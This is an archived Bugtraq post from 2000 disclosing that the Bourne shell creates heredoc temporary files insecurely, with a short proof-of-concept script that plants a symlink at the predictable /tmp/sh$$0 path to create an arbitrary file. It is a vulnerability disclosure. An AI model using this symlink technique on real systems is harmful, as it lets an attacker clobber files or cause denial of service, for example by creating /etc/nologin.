Bugtraq mailing list archives

/bin/sh creates insecure tmp files

From: Paul Szabo <psz () MATHS USYD EDU AU>
Date: Thu, 23 Nov 2000 13:25:28 +1100

Similarly to the recently discussed tcsh vulnerability, the Bourne shell
/bin/sh also creates temporary files in an insecure way, and can be
exploited to create arbitrary files or to overwrite existing ones. While
this vulnerability can be exploited for a denial-of-service attack, it is
not clear how to use it to gain additional privileges.

I have confirmed this vulnerability in two (recent-version) commercial
UNIXes.

Demonstration:

#!/bin/sh -x
ls -l /tmp/nologin
ln -s /tmp/nologin /tmp/sh$$0
cat <<EOF
Only root can create /etc/nologin.
Do any boot-time scripts use sh?
EOF
ls -l /tmp/nologin

Paul Szabo - psz () maths usyd edu au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia

Current thread:

/bin/sh creates insecure tmp files Paul Szabo (Nov 24)
- Re: /bin/sh creates insecure tmp files Kris Kennaway (Nov 25)